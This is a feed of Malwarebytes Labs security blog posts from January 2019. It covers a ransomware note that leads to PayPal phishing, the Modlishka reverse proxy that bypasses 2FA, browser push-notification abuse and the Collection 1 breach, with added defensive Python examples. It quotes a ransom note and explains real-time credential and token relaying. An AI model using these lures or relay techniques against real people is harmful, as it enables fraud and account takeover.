Techie Feeds

Sly criminals package ransomware with malicious ransom note

Malwarebytes - Fri, 01/25/2019 - 18:00

Ransomware continues to evolve. From simple screen lockers to highly sophisticated data lockers, it has become a household name, even though it has been around far longer than most people realize.

Although the criminals behind ransomware campaigns are refining their approaches, moving from the "spray and pray" tactic to something closer to precision targeting, they are also fine-tuning their targets. They can single out organizations, companies, and industries, and they can hold entire cities and towns for ransom.

Ransomware has also stepped up in sophistication. Criminals have begun introducing forms of hybridization into their attacks: either the ransomware file itself is given capabilities outside of its type (e.g., the VirRansom and Zcrypt variants, which also infect files the way a virus does), or the entire campaign combines ransomware with one or more other threat vectors.

The latest in-the-wild ransomware strain discovered by a group of security researchers known as MalwareHunterTeam (MHT, for short) fits the latter.

Ransomware + phishing: a match made in heaven?

Nothing much is known about this ransomware, which some are already dubbing CryTekk, apart from the wily social engineering tactic it applies to its ransom note, presumably to push as many affected parties as possible into acting on the infection and paying. The lure? An additional payment option for affected users who want their files back but don't have a cryptocurrency wallet.

The ransom note. (Courtesy of MalwareHunterTeam)



Dear victim:

Files have been encrypted! And Your computer has been limited!

To unlock your PC you must pay with one of the payment methods provided, we regularly check your activity of your screen and to see if you have paid. Paypal automatically sends us a notification once you’ve paid, But if it doesn’t unlock your PC upon payment contact us (

 Reference Number: CT-{redacted}

When you pay via BTC, send us an email following your REF Number if your PC doesn’t unencrypt. Once you pay, Your PC will de decrypted. However if you don’t within 14 days we will continue to infect your PC and extract all your data and use it.

Google ‘how to buy/pay with bitcoin’ if you don’t know how. To pay by bitcoin: send $40 to your unique bitcoin address.


Clicking the yellow "Buy now" button in the small PayPal option box opens a browser tab that directs users to a phishing page asking for card details:

The first PayPal phishing page, asking for card details. (Courtesy of MalwareHunterTeam)

After supplying the requested information and clicking the "Agree and Confirm" button, users are directed to another phishing page asking for personal information, which they must fill in to "confirm" their identities:

The second PayPal phishing page asking for personally identifiable information (PII). (Courtesy of MalwareHunterTeam)

After filling in all information, clicking the “Agree and Confirm” button points users to a fake confirmation that the user’s account access is fully restored, which is odd because, as far as the user knows, they were paying the ransom, not addressing a problem about their PayPal accounts. Now, if the user hadn’t already realized that they had been duped twice, at this point they might.

The fake “confirmation” page. (Courtesy of MalwareHunterTeam)

Finally, clicking the “My PayPal” button directs users to the legitimate PayPal login page.

Fool me once, shame on me. Fool me twice…

While ransomware is not as rampant today compared to two years ago, it remains a top threat to consumers and businesses alike. It wouldn’t surprise us at all if the real intent of the criminals behind this campaign is to bank on people’s fear of ransomware to go after their money and credentials.

Files encrypted by this ransomware can be decrypted, as confirmed by MHT's own Michael Gillespie in a tweet. In fact, within two hours of the initial MHT tweet, Gillespie was already offering to decrypt files for possible victims. This confirms what Bleeping Computer stated about the ransomware code being "nothing special." It also suggests that the criminals put greater effort into the phishing side of the campaign than into the ransomware itself.

Since most, if not all, ransomware attacks ask for cryptocurrency payment, this attack differentiates itself by offering victims an alternative payment method first, before presenting the Bitcoin option. This leads us to speculate that, although they didn't say it outright, PayPal is the criminals' preferred "payment" method. Also, $40 in Bitcoin in exchange for decrypting files? That's cheap compared to what the criminals stand to make from the card details and PII the phishing pages harvest.

Regardless of whether we see this as a sophisticated ransomware campaign or a “really dope” attempt at phishing, one thing is clear: They are after your money and credentials, so it pays to know when you’re being phished.

It can be frightening to find oneself face-to-face with a ransomware infection, but let us remain calm and keep our heads together. Remember that criminals want us to feel vulnerable, so be and do the opposite. Scrutinize URLs carefully before you enter your credentials or PII. If you feel that something is amiss, follow your gut and don’t proceed any further. If you think you’re stuck and don’t know what to do next, don’t be afraid to ask for help from someone online or in-person who is savvy enough to guide you.

Stay safe out there!

The post Sly criminals package ransomware with malicious ransom note appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A user’s right to choose: Why Malwarebytes detects Potentially Unwanted Programs (PUPs)

Malwarebytes - Fri, 01/25/2019 - 16:00

Potentially Unwanted Programs (PUPs): the name says it all.

While the programs themselves might have legitimate uses, their vendors often use inappropriate methods to drive downloads or hide within a program bundle. At Malwarebytes, we feel we have an obligation to help protect our customers from PUPs by identifying and detecting them and giving the user the right to choose whether they continue using their services.

It’s worth noting that PUP vendors are unhappy when we detect them. Several, including Enigma, have sued us over the detections. Litigation hasn’t deterred us from continuing to flag software that meets our PUP criteria. Fortunately, a federal court in California agreed that customers should have the ability to decide which software runs on their computers and dismissed Enigma’s initial claims. A copy of the Court’s order dismissing Enigma’s case (Case 5:17-cv-02915-EJD Document 105) may be found online at our press center.

These disputes do not affect how we apply our criteria for PUP detections. We continue to identify two Enigma applications, SpyHunter 4 and RegHunter, as PUPs. But another release, SpyHunter 5, changed the application's behavior so that it no longer fits our PUP criteria. We applaud Enigma for the modifications and hope it's a permanent change.

We will continue to evaluate software against our guidelines to give our customers the tools to make an informed choice about the software running on their computers. We prefer to give each individual the right to manage their devices. We enable consumers who want PUPs to control that choice while protecting the vast majority of our customers by keeping those programs on our PUP list. We think this is the best possible path for our company and our customers.

Stay safe everyone!

The post A user’s right to choose: Why Malwarebytes detects Potentially Unwanted Programs (PUPs) appeared first on Malwarebytes Labs.


2019 State of Malware report: Trojans and cryptominers dominate threat landscape

Malwarebytes - Wed, 01/23/2019 - 08:01

Each quarter, the Malwarebytes Labs team gathers to share intel, statistics, and analysis of the tactics and techniques made popular by cybercriminals over the previous three months. At the end of the year, we synthesize this data into one all-encompassing report—the State of Malware report—that aims to follow the most important threats, distribution methods, and other trends that shaped the threat landscape.

Our 2019 State of Malware report is here, and it’s a doozy.

In our research, which covers January to November 2018 and compares it against the previous period in 2017, we found that two major malware categories dominated the scene, with cryptominers positively drenching users at the back end of 2017 and into the first half of 2018, and information-stealers in the form of Trojans taking over for the second half of the year.

But that’s not all we discovered.

The 2019 State of Malware report follows the top 10 global threats for consumers and businesses, as well as top threats by region and by corporate industry verticals. In addition, we followed noteworthy distribution techniques for the year, as well as popular scams. Some of our findings include:

  • In 2018, we saw a shift in ransomware attack techniques from malvertising and exploits that deliver ransomware as a payload to targeted, manual attacks. The shotgun approach was replaced with brute force, as witnessed in the most successful SamSam campaigns of the year.
  • Malware authors pivoted in the second half of 2018 to target organizations over consumers, recognizing that the bigger payoff was in making victims out of businesses instead of individuals. Overall business detections of malware rose by 79 percent over the last year, driven primarily by the increase in backdoors, miners, spyware, and information stealers.

  • The fallout from the ShadowBrokers’ leak of NSA exploits in 2017 continued, as cybercriminals used SMB vulnerabilities EternalBlue and EternalRomance to spread dangerous and sophisticated Trojans, such as Emotet and TrickBot. In fact, information stealers were the top consumer and business threat in 2018, as well as the top regional threat for North America, Latin America, and Europe, the Middle East, and Africa (EMEA).

Finally, our Labs team stared into its crystal ball and predicted top trends for 2019. Of particular note are the following:

  • Attacks designed to avoid detection, like soundloggers, will slip into the wild.

  • Artificial Intelligence will be used in the creation of malicious executables.

  • Movements such as Bring Your Own Security (BYOS) to work will grow as trust declines.

  • IoT botnets will come to a device near you.

To learn more about top threats and trends in 2018 and our predictions for 2019, download our report from the link below.

2019 State of Malware Report

The post 2019 State of Malware report: Trojans and cryptominers dominate threat landscape appeared first on Malwarebytes Labs.


Browser push notifications: a feature asking to be abused

Malwarebytes - Tue, 01/22/2019 - 18:03

“I’m seeing a lot of ads popping up in the corner of my screen, and the Malwarebytes scan does not show there is anything wrong. It says my computer is clean. So what’s happening?”

Our support team runs into questions like this regularly, but the volume seems to be increasing lately. In most of these cases, it helps to look at the “Notification permissions” of the browser displaying this annoying behavior. A good cleansing in that department might be just what you need to get rid of those “pop-ups.”

The problem is that the messages users are seeing are not pop-ups at all, but in fact “push notifications,” often referred to as simply “notifications.” We understand that naming them differently doesn’t make them any less annoying. But it does change our classification of such messages.

Some notifications are not simple advertisements, but rather misleading messages about the safety of your computer.

What are these notifications?

From the Mozilla Developer pages:

The Notifications API lets a web page or app send notifications that are displayed outside the page at the system level; this lets web apps send information to a user even if the application is idle or in the background. This article looks at the basics of using this API in your own apps.

What we can learn from this is that the notifications can originate from a website or from an app. We are going to focus on the case where a website is causing the problem. Any app showing you commercial messages outside of a browser window would get detected as adware by Malwarebytes, so these would not escape a scan.

However, website notifications can be displayed outside the browser window. Wait, what’s the difference between notifications and pop-ups again? A pop-up is a new browser window or tab, whereas notifications are more like tooltips. They are messages that are independent from any open websites.

Notifications show the domain from which they originate, so that could clue you in on the answer to another important question, which is:

How did I get them?

To receive browser notifications, a user must have first allowed them. In Firefox, the dialog to allow them looks like this:

While that seems pretty straightforward, there are trickier sites that use a bit of social engineering to get you to allow their notifications.

The website visitors are led to believe that they have to click “Allow“ to see the video. In fact, if they click the “Allow” button, they will be redirected to another website, sometimes asking yet again to allow notifications, but meanwhile their clicking has allowed this site to show them notifications. And, mind you, the site does not have to be open in the browser for the notifications to pop up. As you can see, the fact that you are allowing notifications is a bit less clear in the Chrome prompt than it is in Firefox.

How do I disable them?

There are some options for disabling notifications. You can disable them altogether or you can disable notifications for specific domains, by removing them from your “Allow” list. You can even add them to your “Blocked” list.

For every browser, the notifications look slightly different and the methods to disable them are slightly different as well. To make them easier to find, I have split them up by browser.

Chrome

To completely turn off notifications, even from an extension:

  • Click the three dots button in the upper right-hand corner of the Chrome menu to enter the Settings menu.
  • Scroll down in the Settings menu and click on Advanced.
  • Under Privacy and Security, select Content settings.
  • In this menu, select Notifications.
  • By default, the slider is set to Ask before sending (recommended), but feel free to move it to Block if you wish to block notifications completely.

For more granular control, you can use this menu to manipulate the individual items. Note that the items with a jigsaw puzzle piece are enforced by an extension, so you would have to figure out which extension first and then remove it. But for the ones with the three dots behind them, you can click on the dots to open this context menu:

Selecting Block will move the item to the block list. Selecting Remove will delete the item from the list. It will ask permission to show notifications again if you visit their site (unless you have set the slider to Block).

Shortcut: another way to get into the Notifications menu shown earlier is to click on the gear icon in the notifications themselves.

This will take you directly to the itemized list.

Firefox

To completely turn off notifications in Firefox:

  • Click the three horizontal bars in the upper right-hand corner of the menu bar and select Options in the settings menu.
  • On the left-hand side, select Privacy & Security.
  • Scroll down to the Permissions section and click on the Settings button behind Notifications.

  • In the resulting menu, put a checkmark in the Block new requests asking to allow notifications box at the bottom.

In the same menu, you can apply a more granular control by setting listed items to Block or Allow by using the drop-down menu behind each item.

Opera

Where push notifications are concerned, you can see how closely related Opera and Chrome are.

  • Open the menu by clicking the O in the upper left-hand corner.
  • Click on Settings (on Windows)/Preferences (on Mac).
  • Click on Advanced and select Privacy & security.
  • Under Content settings (desktop)/Site settings (Android), select Notifications.

On Android, you can remove all the items at once or one by one. On desktops, it works exactly the same as it does in Chrome. The same is true for accessing the menu from the notifications themselves. Click the gear icon in the notification, and you will be taken to the Notifications menu.

Edge

To disable web notifications in Windows:

  • Click the Start button in Windows (Windows icon).
  • Select Settings (gear icon).
  • Select System.
  • Select Notifications & actions.
  • Scroll down and select Microsoft Edge in the list of senders.
  • Here, you set the switch for Notifications to Off or change the notification properties.

You can also manage the notifications on a site-by-site basis in Edge:

  • Click the three dots button in the top-right corner and select Settings.
  • Scroll down and click on View advanced settings.
  • Under Notifications, click on Manage.
  • Here, you can switch notifications off for a specific website.
Safari

Launch Safari and go to Safari > Preferences, or press Command-Comma. Click on the Notifications tab. From there, you can manually disable/enable notifications from select sites, remove all notifications, or access your system-wide Notification Preferences.
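When you are triaging a machine (or a fleet of them), it is often quicker to read the permission stores on disk than to click through each browser's settings. The following is an added example, not code from the Malwarebytes post, that enumerates notification grants from the two formats behind the screens described above. Chrome and Opera keep them in the profile's JSON "Preferences" file under profile.content_settings.exceptions.notifications (setting 1 = allow, 2 = block); Firefox keeps them in permissions.sqlite, table moz_perms, type 'desktop-notification' (permission 1 = allow, 2 = deny). Those field names are what I have seen in current profiles and are an assumption here; verify them against your own browser build. The sample Preferences body and the in-memory permissions database are constructed for the demo.

```python
"""List sites granted browser notification permission from on-disk profile stores.

Added example for this page, not Malwarebytes code. Field names are assumptions
based on current Chrome/Opera and Firefox profiles; sample data is constructed.
"""
import json
import sqlite3

CHROME_STATE = {1: "allow", 2: "block"}    # Chrome content-setting values (assumption)
FIREFOX_STATE = {1: "allow", 2: "block"}   # Firefox moz_perms.permission values (assumption)


def chrome_notification_grants(preferences_json: str):
    """Return sorted (origin, state) tuples from a Chrome/Opera Preferences file body."""
    prefs = json.loads(preferences_json)
    exceptions = (prefs.get("profile", {}).get("content_settings", {})
                  .get("exceptions", {}).get("notifications", {}))
    grants = []
    for pattern, entry in exceptions.items():
        origin = pattern.split(",", 1)[0]   # pattern looks like "https://site.example:443,*"
        state = CHROME_STATE.get(entry.get("setting"), "other")
        grants.append((origin, state))
    return sorted(grants)


def firefox_notification_grants(conn: sqlite3.Connection):
    """Return sorted (origin, state) tuples from an open permissions.sqlite connection."""
    rows = conn.execute(
        "SELECT origin, permission FROM moz_perms WHERE type = 'desktop-notification'"
    ).fetchall()
    return sorted((origin, FIREFOX_STATE.get(perm, "other")) for origin, perm in rows)


def allowed_origins(grants):
    """Only the sites that can currently push notifications to the desktop."""
    return [origin for origin, state in grants if state == "allow"]


# --- constructed sample data (not from any real profile) ----------------------
SAMPLE_CHROME_PREFS = json.dumps({
    "profile": {"content_settings": {"exceptions": {"notifications": {
        "https://news.example:443,*": {"last_modified": "13190000000000000", "setting": 1},
        "https://video-streams-free.example:443,*": {"last_modified": "13190000000000001", "setting": 1},
        "https://shop.example:443,*": {"last_modified": "13190000000000002", "setting": 2},
    }}}}
})


def sample_firefox_db() -> sqlite3.Connection:
    """In-memory permissions.sqlite with the moz_perms columns Firefox uses (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE moz_perms (id INTEGER PRIMARY KEY, origin TEXT, type TEXT,
                    permission INTEGER, expireType INTEGER, expireTime INTEGER,
                    modificationTime INTEGER)""")
    conn.executemany(
        "INSERT INTO moz_perms VALUES (NULL, ?, ?, ?, 0, 0, 0)",
        [("https://mail.example", "desktop-notification", 1),
         ("https://click-allow-to-watch.example", "desktop-notification", 1),
         ("https://mail.example", "geo", 1),      # unrelated permission type, must be ignored
         ("https://ads.example", "desktop-notification", 2)],
    )
    conn.commit()
    return conn


if __name__ == "__main__":
    import sys
    # Usage: python notif_grants.py <Chrome "Preferences" file> <copy of permissions.sqlite>
    if len(sys.argv) == 3:
        with open(sys.argv[1], encoding="utf-8") as fh:
            chrome = chrome_notification_grants(fh.read())
        firefox = firefox_notification_grants(sqlite3.connect(sys.argv[2]))
    else:
        chrome = chrome_notification_grants(SAMPLE_CHROME_PREFS)
        firefox = firefox_notification_grants(sample_firefox_db())
    for label, grants in (("Chrome/Opera", chrome), ("Firefox", firefox)):
        print(label, "allowed:", allowed_origins(grants))
```

Run it with no arguments to see the constructed sample, or point it at a Chrome "Preferences" file and a copy of a Firefox profile's permissions.sqlite (copy the database first; Firefox holds a lock on it while running). Anything in the "allowed" list that the user does not recognize is a candidate for the Block list, and an origin like the click-allow-to-watch one above is exactly the fingerprint of the "click Allow to see the video" lure.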

Are these notifications useful at all?

While we could conceive of some cases where push notifications might be found useful, we would certainly not hold it against you if you decided to disable them altogether.

Web push notifications are not just there to disturb Windows users. Android, Chromebook, macOS, and even Linux users may see them if they use one of the participating browsers: Chrome, Firefox, Opera, Edge, and Safari. In some cases, the browser does not even have to be open for push notifications to appear.

Be careful out there and think twice before you click “Allow.”

The post Browser push notifications: a feature asking to be abused appeared first on Malwarebytes Labs.


A week in security (January 14 – 20)

Malwarebytes - Mon, 01/21/2019 - 16:48

Last week on the Malwarebytes Labs blog, we took a look at how the government shutdown is influencing cybersecurity jobs, the Advanced Persistent Threat group APT10, the comeback of Fallout EK, the hosting of malicious sites on legitimate servers, and the Collection 1 data breach.

Other cybersecurity news
  • New Zealand-based cryptocurrency exchange Cryptopia has gone offline after suffering a security breach, which resulted in significant losses. Cryptopia has notified and involved relevant government agencies, including the New Zealand police and the High-Tech Crimes Unit. (Source: Coindesk)
  • A former employee of a British company pleaded guilty to one count of gaining unauthorised access to a network with intent to commit further offences, and one count of committing unauthorised acts with the intent to impair the operation of a computer within a network. The employee was ordered to pay £20,000 compensation. (Source: Leamington Observer)
  • A California judge has ruled that American cops can’t force people to unlock a mobile phone with their face or finger. The ruling further protects people’s private lives from government searches, and is being hailed as a potentially landmark decision. (Source: Forbes)
  • The Oregon State Department of Administrative Services’ (DAS) Office of the State Chief Information Officer overpaid for services by between $400 million and $1.6 billion during the 2015 to 2017 timeframe, according to an audit by the Oregon Secretary of State Audit Division that looked at $8 billion of spending. (Source: CioDive)
  • The recent Windows security patch CVE-2019-0543 has introduced a breaking change for a PowerShell remoting scenario. It is a narrowly-scoped scenario that should have low impact for most users, as the breaking change only affects local loopback remoting. (Source: PowerShell Team Blog)
  • The Iceman cometh, his smartwatch told the cops: Hitman jailed after gizmo links him to Brit gangland slayings. Avid runner and hitman Mark Fellows was this week found guilty of murder after being grassed up by his Garmin watch. (Source: The Register)
  • Security flaws were discovered in ThreadX, a real-time operating system (RTOS) developed by Express Logic. The vendor claims on its website that ThreadX has over 6.2 billion deployments, making it one of the most widely used operating systems powering Wi-Fi chips. (Source: BleepingComputer)
  • Decrypted Telegram bot chatter was found to actually be a new Windows malware, dubbed GoodSender, which uses the messenger platform to listen and wait for commands. The attacker can use Telegram to communicate with the malware and send HTTPS-protected instructions. (Source: SC Media)
  • A Fortnite security flaw could have exposed players’ accounts. Security researchers found vulnerabilities on Epic’s site that could have let hackers access accounts. They were able to listen to Fortnite squad members speaking with each other and could have bought V-Bucks virtual currency using players’ stored credit card details. (Source: Engadget)
  • Pranks and challenges have always been popular on YouTube, but now the Google-owned company has set stricter guidelines for such content. A new YouTube support page provides details for a ban on pranks and challenges that cause immediate or lasting physical or emotional harm. (Source: ArsTechnica)

Stay safe, everyone!

The post A week in security (January 14 – 20) appeared first on Malwarebytes Labs.


Has two-factor authentication been defeated? A spotlight on 2FA’s latest challenge

Malwarebytes - Mon, 01/21/2019 - 16:15

Multiple news reports about the defeat of two-factor authentication (2FA) have been making rounds lately.

In November 2018, our friends at ESET discovered a purported Android battery utility tool called “Optimization Android” from a third-party app store. This app was designed to steal money from a user’s PayPal account without relying on stolen credentials. It operates by modifying a device’s Accessibility settings and enabling the use of Android’s overlay accessibility feature. This then allows a malicious accessibility service to mimic the user’s clicks to access the legitimate app and wire money to the criminal’s own PayPal address.

Long story short: This method effectively bypasses 2FA.

Then in mid-December, researchers at the Computer Emergency Response Team in Farsi (CERTFA) Lab released a report about “The Return of Charming Kitten,” a fresh slew of state-backed phishing attacks on individuals involved in sanctions against Iran and others, but focusing more on people based in the United States and Israel. State actors have found a way to fool targets into giving away their Gmail and Yahoo! 2-step verification codes.

Days after CERTFA’s report, Amnesty International broke the news that broad, targeted phishing campaigns were set against thousands of human rights defenders (HRDs), journalists, and political actors in countries throughout the Middle East and Northern Africa (MENA). The threat actors behind at least one campaign had also actively and deliberately taken steps to bypass common forms of 2FA.

A mantis lies in wait

The latest means to circumvent 2FA was made public by Polish security researcher Piotr Duszyński not long after the New Year. He called it Modlishka—the English phonetic spelling of the Polish word for 'mantis'—and described it as "a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side)." It was released as a tool to help penetration testers conduct authorized phishing assessments.

With its release, Duszyński emphasized the effectiveness and seriousness of social engineering attacks. In the wrong hands, a tool like Modlishka can be misused to create a compelling and sophisticated phishing campaign that is significantly easier to run and far more difficult for users to detect and avoid.

Overview of collected information from a simulated phishing campaign (Courtesy of Piotr Duszyński)

How Modlishka works

Modlishka is a reverse proxy: it sits between the victim and the legitimate website it impersonates. The phishing domain the user visits is served by the proxy, which fetches every page from the real site on the fly and rewrites references to the real domain so that the victim stays on the phishing domain while seeing the genuine site's content.

For this tool to successfully do its job—and, in turn, for the campaign to work—phishing campaign operators must first make their targets believe that they are on the website they expect to be on so that victims will enter their credentials without suspicion. Any interactions the user makes within the phishing page, including entering credentials, are passed through and recorded by Modlishka first before forwarding them to the legitimate website in real time.

The tool also prompts the user for a token when the account has 2FA enabled, and relays it to the legitimate website the same way it relays the password. Because the relay happens in real time, a time-based one-time password (TOTP) is consumed within its validity window without the phisher having to type anything; the code does not need to be reused, because what the operator collects is the credentials plus the authenticated session that results from the relayed login.

Assuming everything went smoothly, the user is then redirected to the legitimate website and successfully logged in to conclude the phishing attack. Below is a video of Modlishka in action.

Courtesy of Piotr Duszyński

How users can protect themselves

To stop Modlishka dead in its tracks, Duszyński advised the use of hardware security keys that support the Universal 2nd Factor (U2F) standard, such as the YubiKey and the Titan Security Key. U2F works because the key signs a challenge that is bound to the origin the browser is actually talking to, so a signature produced while on the phishing domain is useless on the real site; a one-time-code hardware token in the RSA SecurID style does not give this protection, since its code can be relayed like any other OTP. According to Matias Brutti, Director of Research and Exploitation at Okta, push authentication can also render such campaigns less effective, although a victim who approves the push prompt triggered by the relayed login defeats that too.
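To make the difference between a relayed TOTP code and a U2F assertion concrete, here is an added example in Python. It is not code from the post and not Modlishka's own code; the relying party, the security key and the proxy are simplified stand-ins written for this page. The U2F "signature" is an HMAC over challenge || origin with a per-key secret (standing in for the ECDSA signature a real key produces), the TOTP generator follows RFC 6238, and the origins accounts.example and accounts-example.phish are made up. It shows the relay described in the previous section succeeding against password + TOTP and failing against password + U2F, because the origin is part of what the key signs and the real site checks it.

```python
"""Why a real-time phishing proxy can relay a TOTP code but not a U2F assertion.

Added example (not Malwarebytes or Modlishka code). Relying party, key and proxy
are simplified models; HMAC stands in for the key's ECDSA signature.
"""
import hashlib
import hmac
import secrets
import struct
import time

LEGIT_ORIGIN = "https://accounts.example"        # assumed legitimate site
PHISH_ORIGIN = "https://accounts-example.phish"  # assumed attacker-controlled domain


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the time counter, then dynamic truncation."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def sign_assertion(key_secret: bytes, challenge: bytes, origin: str) -> bytes:
    """Stand-in for the U2F signature: the origin is always part of the signed data."""
    return hmac.new(key_secret, challenge + origin.encode(), hashlib.sha256).digest()


class RelyingParty:
    """The legitimate site: password + TOTP, or password + U2F."""

    def __init__(self, origin: str):
        self.origin = origin
        self.users = {}       # user -> {"pw", "totp", "key"}
        self.pending = set()  # challenges issued but not yet used
        self.sessions = {}    # session token -> user

    def register(self, user, password, totp_secret, key_secret):
        self.users[user] = {"pw": password, "totp": totp_secret, "key": key_secret}

    def _password_ok(self, user, password):
        u = self.users.get(user)
        return u is not None and hmac.compare_digest(u["pw"].encode(), password.encode())

    def _issue_session(self, user):
        token = secrets.token_hex(16)
        self.sessions[token] = user
        return token

    def login_totp(self, user, password, code, now):
        if not self._password_ok(user, password):
            return None
        if not hmac.compare_digest(totp(self.users[user]["totp"], now), code):
            return None
        return self._issue_session(user)

    def u2f_challenge(self) -> bytes:
        challenge = secrets.token_bytes(32)
        self.pending.add(challenge)
        return challenge

    def login_u2f(self, user, password, challenge, client_origin, signature):
        if not self._password_ok(user, password) or challenge not in self.pending:
            return None
        self.pending.discard(challenge)
        # The browser reports the origin it is on; the site requires its own origin,
        # and the signature must cover that same origin. A signature made on the
        # phishing origin fails here even though everything else was relayed.
        if client_origin != self.origin:
            return None
        expected = sign_assertion(self.users[user]["key"], challenge, client_origin)
        return self._issue_session(user) if hmac.compare_digest(expected, signature) else None


class SecurityKey:
    """User's hardware key: signs challenge || whatever origin the browser reports."""

    def __init__(self, key_secret: bytes):
        self.key_secret = key_secret

    def sign(self, challenge: bytes, browser_origin: str) -> bytes:
        return sign_assertion(self.key_secret, challenge, browser_origin)


class PhishingProxy:
    """Reverse proxy on PHISH_ORIGIN that relays every input to the real site in real time."""

    def __init__(self, rp: RelyingParty):
        self.rp = rp
        self.captured = []

    def relay_totp_login(self, user, password, code, now):
        self.captured.append((user, password, code))
        return self.rp.login_totp(user, password, code, now)   # still valid: same 30s step

    def relay_u2f_login(self, user, password, key: SecurityKey):
        self.captured.append((user, password))
        challenge = self.rp.u2f_challenge()                    # fetched from the real site
        # The victim's browser is on PHISH_ORIGIN, so that is the origin it hands the key.
        signature = key.sign(challenge, PHISH_ORIGIN)
        return self.rp.login_u2f(user, password, challenge, PHISH_ORIGIN, signature)


def demo():
    """Returns (session via relayed TOTP, session via relayed U2F)."""
    rp = RelyingParty(LEGIT_ORIGIN)
    totp_secret, key_secret = b"totp-seed-for-demo", b"u2f-key-secret-for-demo"
    rp.register("alice", "correct horse", totp_secret, key_secret)
    proxy = PhishingProxy(rp)
    now = int(time.time())
    totp_session = proxy.relay_totp_login("alice", "correct horse", totp(totp_secret, now), now)
    u2f_session = proxy.relay_u2f_login("alice", "correct horse", SecurityKey(key_secret))
    return totp_session, u2f_session


if __name__ == "__main__":
    t, u = demo()
    print("relayed TOTP  -> attacker holds a session:", t is not None)
    print("relayed U2F   -> attacker holds a session:", u is not None)
```

Running it prints True for the TOTP relay and False for the U2F relay. The same origin check is what makes FIDO2/WebAuthn keys phishing-resistant; the only other change a real implementation needs is a public-key signature in place of the HMAC stand-in, which does not alter the logic shown.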

Since all the incidents we mentioned here are all phishing attempts, it still pays to know what to look out for when determining whether a website, email, text, or other communication is a phish. Never click unknown links without verifying their authenticity first. Always check the URLs in the address bar—and remember, the green padlock is no longer enough to identify whether a site is safe or not.

Furthermore, users should drop SMS 2FA in favour of a stronger second factor, such as an authenticator app, a hardware key, or biometrics. Be aware, though, that an authenticator app's TOTP code is exactly what a real-time proxy like Modlishka relays; it protects against SIM swapping and SMS interception, not against this kind of phishing, so an origin-bound factor such as a U2F key is the stronger choice. Make it a point to regularly review account access logs to check whether someone other than yourself is attempting to gain entry to your online accounts. Avoid conducting business, especially anything involving the exchange of sensitive information or documents, using your personal email. If you can, add encryption to your messages by using Pretty Good Privacy (PGP). Lastly, use a password manager: it not only has a better memory than its human, it also keeps you away from phishing sites, because it checks the URL in the address bar before auto-filling credentials and will stay silent on a domain it has never seen.

For mobile users, avoid downloading apps from third-party stores. Better yet, avoid looking for app utilities you think will optimize your mobile device. For example, if you’re looking to extend battery life, don’t download an app. Adopt some simple steps, such as turning off GPS when you’re not using it, or using the phone in battery-saver mode.

2FA is still good to have

Adopting 2FA is well-known, popular cybersecurity advice we give to those who want to beef up the security—and consequently, the privacy—of their accounts. But it’s also a known fact that 2FA is not bulletproof, hack-proof, or the cybersecurity panacea many assume it to be.

It is true that some forms, such as SMS-based OTPs, are a lot easier to circumvent than others. It is also true that there are more than 10 known ways to defeat 2FA to date. However, this doesn't mean that 2FA itself is broken. Using 2FA is still far better than having just a username and password locking your account.

The defeat of certain forms of 2FA isn’t a call for total abandonment nor should it be considered as one. It signals us, the users, to explore and go for better, more advanced forms of 2FA in securing our accounts. It also forces us to re-think our habits, adapt accordingly to this change in the threat landscape, and continue to learn about the latest social engineering tactics and tricks that could target us in the environments and sites we frequent.

Stay safe!


The post Has two-factor authentication been defeated? A spotlight on 2FA’s latest challenge appeared first on Malwarebytes Labs.


Collection 1 data breach: what you need to know

Malwarebytes - Fri, 01/18/2019 - 18:33

Yesterday, news broke that the largest data dump in history had been discovered, with more than 770 million people's email addresses and passwords, many of the passwords already cracked from hashed form, catalogued and up for grabs on the Internet. The files, which are being dubbed Collection 1, were originally found on the cloud service MEGA, and later posted to a popular hacking forum.

The Collection 1 folder contains more than 12,000 files and is a whopping 87 gigabytes large.

While on paper this sounds beyond alarming, the truth is more nuanced. The collection is composed of data pulled together from multiple breaches and leaks, many of which contain email addresses and passwords that are at least two to three years old. Security journalist Brian Krebs cautioned folks against assigning too much significance to the find, because the data is rather stale and not particularly useful to threat actors.

However, as we saw in summer 2018, stale data can be used successfully in phishing and extortion campaigns. The mere mention of a correct password, even if it’s outdated, could coax unsuspecting users into giving up fresh PII or paying ransoms.

Every time an organization announces that it’s been breached, customers wait with bated breath to see if they’ve been impacted. But after a time, if an identity theft crisis, credit card tampering, or straight-up hack doesn’t take place, many users breathe a sigh of relief and imagine they’ve weathered the storm. Yet, as evidenced by Collection 1 and other such treasure troves of data that are offered for sale online, that may not be the end of it. If users don’t take steps to protect or change their credentials after a breach, they are at risk of being targeted again and again.

Our advice to users: Take a look to see whether your information is caught up in this latest data dump. You can easily check by using researcher Troy Hunt's website Have I Been Pwned. Once there, enter your email address and scroll to the bottom of the page to see whether you are part of Collection 1 or any other breaches. In addition, you can check whether a password you use has appeared in a breach with another feature of Hunt's site, Pwned Passwords. That check never sends your password to the site: only the first five characters of the password's SHA-1 hash leave your machine, and the comparison happens locally.

If you are on any of these lists, go forth and change your passwords immediately. We also recommend using a password manager and following other password best practices, such as avoiding using the same password across multiple sites and using long phrases that do not contain obvious dates, names, or other easily identifiable (and thus crackable) information.
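For anyone who wants to run the same check against their own password store or across a team without pasting passwords into a web form, here is an added example (not code from the post, and not Have I Been Pwned's own client) of the k-anonymity range lookup the Pwned Passwords API uses. The password is hashed with SHA-1 locally, the first five hex characters of the hash are sent to https://api.pwnedpasswords.com/range/<prefix>, and the response, a list of SUFFIX:COUNT lines, is compared against the remaining 35 characters on your machine. The network call is isolated in fetch_range() so the matching logic can be exercised offline; the SAMPLE_RANGE_5BAA6 body below is constructed for the demo (the suffix for "password" is real, the counts and the other suffixes are made up).

```python
"""Check a password against Pwned Passwords without sending the password.

Added example for this page, not Malwarebytes or HIBP code. Only the 5-character
SHA-1 prefix is sent; everything else is compared locally (k-anonymity range API).
"""
import hashlib
import urllib.request

RANGE_URL = "https://api.pwnedpasswords.com/range/"   # public Pwned Passwords endpoint


def sha1_prefix_suffix(password: str):
    """Split the uppercase hex SHA-1 of the password into the 5-char prefix and the rest."""
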